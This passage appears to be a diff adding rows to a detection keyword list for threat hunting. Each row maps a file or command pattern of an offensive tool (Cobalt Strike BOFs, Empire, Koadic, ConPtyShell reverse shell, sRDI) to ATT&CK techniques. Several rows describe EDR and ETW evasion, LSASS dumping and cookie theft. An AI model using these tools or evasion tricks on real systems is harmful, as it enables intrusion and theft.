+"*communicate_as_backdoor_user.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*comnap_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z"
+"*comnode_##*","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*compile_implant*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*completedns-get-ns-history*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*COMPlus_ETWEnabled=0\0\0\0*","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? 
Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*compress_encode_obfs*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*computers_pwdnotreqd*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*comsvcs_lsass*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. 
is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*ComsvcsLSASS*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*config/51pwn/CVE-*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"*Confuser.CLI.Exe*","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","825","133","2023-09-06T05:17:05Z","2022-12-08T19:40:47Z" +"*Confuser.CLI.exe*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Confuser.DynCipher.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" 
+"*Confuser.Renamer.dll*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Connect-AzureAD -AadAccessToken -AccountId *","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","0","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Connection refused: tcp_wrappers denial.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*Connection refused: too many sessions for this address.*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" +"*connormcgarr/tgtdelegation*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 
- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" +"*conptyshell *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*ConPtyShell.cs*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell.zip*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*ConPtyShell_dotnet2.exe*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*-consoleoutput -DomainRecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*-consoleoutput 
-Localrecon*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*contact_harvester*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" +"*ContainYourself.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourself.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourself.sln*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" 
+"*ContainYourself-main*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfPoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfPoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfPoc\*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContainYourselfTempFile.txt*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*ContentHijacking.swf*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*ConvertFrom-LDAPLogonHours*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Convert-NT4toCanonical*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of 
Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*ConvertTo-LogonHoursArray*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-Rc4ByteStream*","offensive_tool_keyword","empire","empire function name. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ConvertTo-ROT13.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*ConvertTo-Shellcode -*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","0","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*ConvertToShellcode*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*ConvertTo-Shellcode.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. 
Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*ConvertTo-Shellcode.ps1*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*ConvertToShellcode.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" +"*ConvertToShellcode.py*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z" +"*cookie_graber_x64.o*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*cookie-graber.c*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*cookie-graber_x64.exe*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*Cookie-Graber-BOF*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*CookieProcessor.exe*","offensive_tool_keyword","cobaltstrike","C or BOF file to extract WebKit master key to decrypt user cookie. 
The C code can be used to compile an executable or a bof script for Cobalt Strike.","T1552.002 - T1027.001 - T1059.003 - T1003.001","TA0006 - TA0005 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF","1","1","N/A","10","10","104","14","2023-05-28T18:41:15Z","2023-05-28T18:30:02Z" +"*cool*/cool.zip*","offensive_tool_keyword","C2 related tools","An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Ed1s0nZ/cool","1","1","N/A","10","10","668","113","2023-07-13T07:04:30Z","2021-11-10T14:32:34Z" +"*CoolerVoid/0d1n*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
